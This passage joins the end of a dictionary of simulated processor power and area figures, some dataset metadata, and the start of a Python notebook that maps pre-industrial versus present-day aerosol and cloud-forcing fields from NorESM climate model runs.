'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0523471,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.13212,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0359823,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.230951,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.185846,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.090582,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.146105,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0737491,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.310436,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0751058,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.30202,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0351104,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00379941,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0412899,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.028099,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0764002,
'Execution Unit/Register Files/Runtime Dynamic': 0.0318984,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0959837,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.255689,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.23435,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000261998,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000261998,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000228631,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 8.87431e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000403644,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00115627,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00249658,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0270123,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.71821,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0739899,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0917459,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.02012,
'Instruction Fetch Unit/Runtime Dynamic': 0.196401,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.059667,
'L2/Runtime Dynamic': 0.016704,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.31803,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.547845,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0349699,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0349699,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.48316,
'Load Store Unit/Runtime Dynamic': 0.755275,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0862298,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.17246,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0306032,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0314874,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.106832,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0121653,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.315512,
'Memory Management Unit/Runtime Dynamic': 0.0436527,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.7699,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0923598,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00521081,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0448046,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.142375,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.38876,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 5.813424232297078,
'Runtime Dynamic': 5.813424232297078,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.29799,
'Runtime Dynamic': 0.0870334,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 68.6417,
'Peak Power': 101.754,
'Runtime Dynamic': 12.9273,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 68.3437,
'Total Cores/Runtime Dynamic': 12.8403,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.29799,
'Total L3s/Runtime Dynamic': 0.0870334,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.09081
| 124
| 0.682121
| 8,087
| 68,633
| 5.783109
| 0.067145
| 0.123503
| 0.112898
| 0.093397
| 0.939018
| 0.93115
| 0.9177
| 0.887744
| 0.861829
| 0.842007
| 0
| 0.132151
| 0.224251
| 68,633
| 914
| 125
| 75.09081
| 0.746253
| 0
| 0
| 0.642232
| 0
| 0
| 0.657182
| 0.048081
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc0295a5817b841da88a007d236cedc49012cd5b
| 34,984
|
py
|
Python
|
oas_erf/notebooks/01_maps/PD_PI/02_maps_abs_diff_diff.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
oas_erf/notebooks/01_maps/PD_PI/02_maps_abs_diff_diff.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
oas_erf/notebooks/01_maps/PD_PI/02_maps_abs_diff_diff.py
|
sarambl/OAS-ERF
|
7510c21a630748eda2961608166227ad77935a67
|
[
"MIT"
] | null | null | null |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.3.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %% [markdown]
# ## Plot abs, diff, diff for PI and PD
#
#
# %%
# load and autoreload
from IPython import get_ipython
from IPython.display import clear_output
from matplotlib import colors
from useful_scit.imps import (plt)
from oas_erf.data_info.simulation_types import get_abs_by_type
from oas_erf.constants import get_plotpath
from oas_erf.data_info.simulation_types import get_casen_by_type_mod
from oas_erf.util.imports import get_averaged_fields
from oas_erf.util.practical_functions import make_folders
from oas_erf.util.slice_average.significance import load_and_plot_sign
# noinspection PyBroadException
try:
_ipython = get_ipython()
_magic = _ipython.magic
_magic('load_ext autoreload')
_magic('autoreload 2')
except ImportError:
pass
from oas_erf.util.plot.maps_PIPD import abs_diffs_PI_PD_sep
# %%
import cartopy.crs as ccrs
# %% [markdown]
# ### Div settings:
# %%
p_level = 1013.
pmin = 850. # minimum pressure level
avg_over_lev = True # True#True#False#True
pressure_adjust = True # Can only be false if avg_over_lev false. Plots particular hybrid sigma lev
p_levels = [1013., 900., 800., 700., 600.] # used if not avg
# %%
model = 'NorESM'
startyear = '0004-01'
endyear = '0008-12'
# %%
cases_sec = [
'NF1850_SECT_ctrl',
'NF1850_aeroxid2014_SECT_ctrl'
]
cases_orig = [
'NF1850_noSECT_def',
'NF1850_aeroxid2014_noSECT_def',
'NF1850_aeroxid2014_noSECT_ox_ricc',
'NF1850_noSECT_ox_ricc'
]
cases = cases_orig + cases_sec
# %% [markdown]
# ### For output names:
# %%
version = 'pi_pd_diff'
plot_path = get_plotpath('maps')
filen_base = plot_path + '/%s' % version
# print(plot_path)
make_folders(plot_path)
# %%
print(filen_base)
# %% [markdown]
# ### Variables to load:
# %%
varl = ['NCONC01', 'NMR01', 'N_AER', 'NCONC08', 'NCONC09', 'NMR08', 'NMR09', 'ACTNL_incld',
'ACTREL_incld', 'CDNUMC', 'cb_NA', 'cb_SOA_NA', 'cb_SO4_NA', 'AWNC_incld', 'AREL_incld',
'TGCLDLWP', 'DIR_Ghan', 'SWCF_Ghan', 'LWCF_Ghan', 'NCFT_Ghan', 'N50', 'N100',
'N250', 'N150', 'N200', 'SIGMA01', 'NMR01', 'NCONC01']
subfig_size = 2.9
asp_ratio = .9
print(varl)
# %%
case_dic = get_averaged_fields.get_maps_cases(cases,
varl,
startyear,
endyear,
avg_over_lev=avg_over_lev,
pmin=pmin,
pressure_adjust=pressure_adjust,
p_level=p_level,
)
# %% [markdown]
# ## Calculate various variables:
# %%
for case in cases:
_ds = case_dic[case]
_ds['NPF_frac'] = _ds['NCONC01'] / _ds['N_AER'] * 100
_ds['NPF_frac'].attrs['units'] = '%'
if 'NPF_frac' not in varl:
varl.append('NPF_frac')
# %% [markdown]
# ### Organize data in easy to use format:
# %%
relative = False
dic_abs = get_abs_by_type(case_dic,
case_types=['PI', 'PIaerPD'],
mod_types=None)
# %% [markdown]
# ## Plots:
# %%
var = 'NPF_frac'
relative = False
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
# , 'ACTNL_incld', 'ACTREL_incld'],
# norm_abs=norm_abs,
# norm_dic=norm_dic
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'}
)
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %% [markdown]
# ## Settings for colorbars:
# %%
norm_dic = dict(
SOA_LV=colors.SymLogNorm(vmin=-5e-1, vmax=5e-1, linthresh=.01, base=10, linscale=.4),
H2SO4=colors.SymLogNorm(vmin=-5e-1, vmax=5e-1, linthresh=.01, base=10, linscale=.4),
NCONC01=colors.SymLogNorm(vmin=-1e3, vmax=1e3, linthresh=10, base=10, linscale=.4),
NMR01=colors.SymLogNorm(vmin=-10, vmax=10, linthresh=1, base=10), # linscale=.5),
AWNC_incld=colors.SymLogNorm(vmin=-50, vmax=50, linthresh=1, base=10),
ACTNL_incld=colors.SymLogNorm(vmin=-40, vmax=40, linthresh=1, linscale=0.4, base=10),
AREL_incld=colors.SymLogNorm(vmin=-5, vmax=5, linthresh=.1, base=10),
ACTREL_incld=colors.SymLogNorm(vmin=-7, vmax=7, linthresh=.1, base=10, linscale=0.5),
CDNUMC=None,
SWCF_Ghan=colors.Normalize(vmin=-2, vmax=2),
LWCF_Ghan=colors.Normalize(vmin=-2, vmax=2),
NCFT_Ghan=colors.Normalize(vmin=-2, vmax=2),
)
norm_dic_rel = dict(
SOA_LV=colors.Normalize(vmin=-50, vmax=50),
H2SO4=colors.Normalize(vmin=-50, vmax=50),
NCONC01=colors.Normalize(vmin=-250, vmax=250),
NMR01=colors.Normalize(vmin=-50, vmax=50),
AWNC_incld=colors.Normalize(vmin=-50, vmax=50),
ACTNL_incld=colors.Normalize(vmin=-13, vmax=13),
AREL_incld=colors.Normalize(vmin=-10, vmax=10),
ACTREL_incld=colors.Normalize(vmin=-7, vmax=7),
CDNUMC=colors.Normalize(vmin=-12, vmax=12),
SWCF_Ghan=colors.Normalize(vmin=-2, vmax=2),
LWCF_Ghan=colors.Normalize(vmin=-2, vmax=2),
NCFT_Ghan=colors.Normalize(vmin=-2, vmax=2),
)
norm_abs = norm_dic.copy()
norm_abs['SWCF_Ghan'] = colors.Normalize(vmin=-5, vmax=5)
norm_abs['LWCF_Ghan'] = colors.Normalize(vmin=-3, vmax=3)
norm_abs['NCFT_Ghan'] = colors.Normalize(vmin=-5, vmax=5)
norm_diff_dic = dict(
ACTNL_incld=colors.Normalize(vmin=-20, vmax=20),
N50=colors.Normalize(vmin=-45, vmax=45),
N100=colors.Normalize(vmin=-20, vmax=20),
N150=colors.Normalize(vmin=-10, vmax=10), # colors.Normalize(vmin=-5, vmax=5),
N200=colors.Normalize(vmin=-15, vmax=15), # colors.Normalize(vmin=-5, vmax=5),
)
norm_diff_dic = dict(
ACTNL_incld=colors.Normalize(vmin=-12, vmax=12),
N50=colors.Normalize(vmin=-45, vmax=45),
N100=colors.Normalize(vmin=-10, vmax=10),
N150=colors.Normalize(vmin=-4, vmax=4), # colors.Normalize(vmin=-5, vmax=5),
N200=colors.Normalize(vmin=-5, vmax=5), # colors.Normalize(vmin=-5, vmax=5),
)
norm_dic['NCFT_Ghan'] = colors.Normalize(vmin=-1.8, vmax=1.8)
norm_dic['ACNTL_incld'] = colors.SymLogNorm(vmin=-40, vmax=40, linthresh=1, linscale=0.4, base=10)
# %% [markdown]
# ## define cases to be ctrl or other:
# %%
cases_oth = ['OsloAero$_{imp}$', 'OsloAero$_{def}$']
ctrl = 'OsloAeroSec'
# %%
var = 'DIR_Ghan'
relative = False
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
# norm_diff = norm_dic['NCFT_Ghan'],
norm_diff=colors.Normalize(vmin=-.12, vmax=.12)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=None, hatch_lw=1, transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
axs = [axs_dic['PI'][c] for c in ['OsloAeroSec', 'OsloAero$_{imp}$', 'OsloAero$_{def}$']] # [cases_oth]
# subp_insert_abc(np.array(axs), pos_x=0.01,pos_y=1.0)
fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
fig.savefig(fn, dpi=300)
plt.show()
print(fn)
# %%
var = 'NCONC01'
relative = True
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
norm_diff=colors.Normalize(vmin=-100, vmax=100)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False
)
clear_output()
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'NCFT_Ghan'
relative = False
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
norm_diff=norm_dic['NCFT_Ghan'],
cmap_abs='RdBu_r'
# norm_diff=colors.Normalize(vmin=-100, vmax=100)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
axs = [axs_dic['PI'][c] for c in ['OsloAeroSec', 'OsloAero$_{imp}$', 'OsloAero$_{def}$']] # [cases_oth]
# subp_insert_abc(np.array(axs), pos_x=0.01,pos_y=1.0)
fig.savefig(filen_base + f'{var}_PIPD_sep_rel{relative}.pdf', dpi=300)
plt.show()
# %%
var = 'SWCF_Ghan'
relative = False
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
norm_diff=norm_dic['NCFT_Ghan'],
cmap_abs='Blues_r'
# norm_diff=colors.Normalize(vmin=-100, vmax=100)
)
for ct in ['PI', 'PIaerPD']:
ax_di = axs_dic[ct]
for case_oth in cases_oth:
ax = ax_di[case_oth]
cs_to = get_casen_by_type_mod(ct, ctrl)
cs_from = get_casen_by_type_mod(ct, case_oth)
load_and_plot_sign(cs_to, [cs_from], [ax], var, startyear, endyear, pressure_adjust=pressure_adjust,
avg_over_lev=avg_over_lev,
ci=.95,
groupby=None,
dims=('lev',),
area='Global',
avg_dim='time',
hatches=['...', ''],
hatch_lw=.6,
transform=ccrs.PlateCarree(),
reverse=False)
clear_output()
fn = filen_base + f'{var}_PIPD_sep_rel{relative}.pdf'
fig.savefig(fn, dpi=300)
plt.show()
print(fn)
# %%
var = 'LWCF_Ghan'
relative = False
fig, axs_dic = abs_diffs_PI_PD_sep(dic_abs,
var,
relative=relative,
type_nndic={'PI': 'Pre-industrial', 'PIaerPD': 'Present day'},
switch_diff=True,
norm_diff=norm_dic['NCFT_Ghan'],
# norm_diff=colors.Normalize(vmin=-100, vmax=100)
)
for ct in ['PI', 'PIaerPD']:
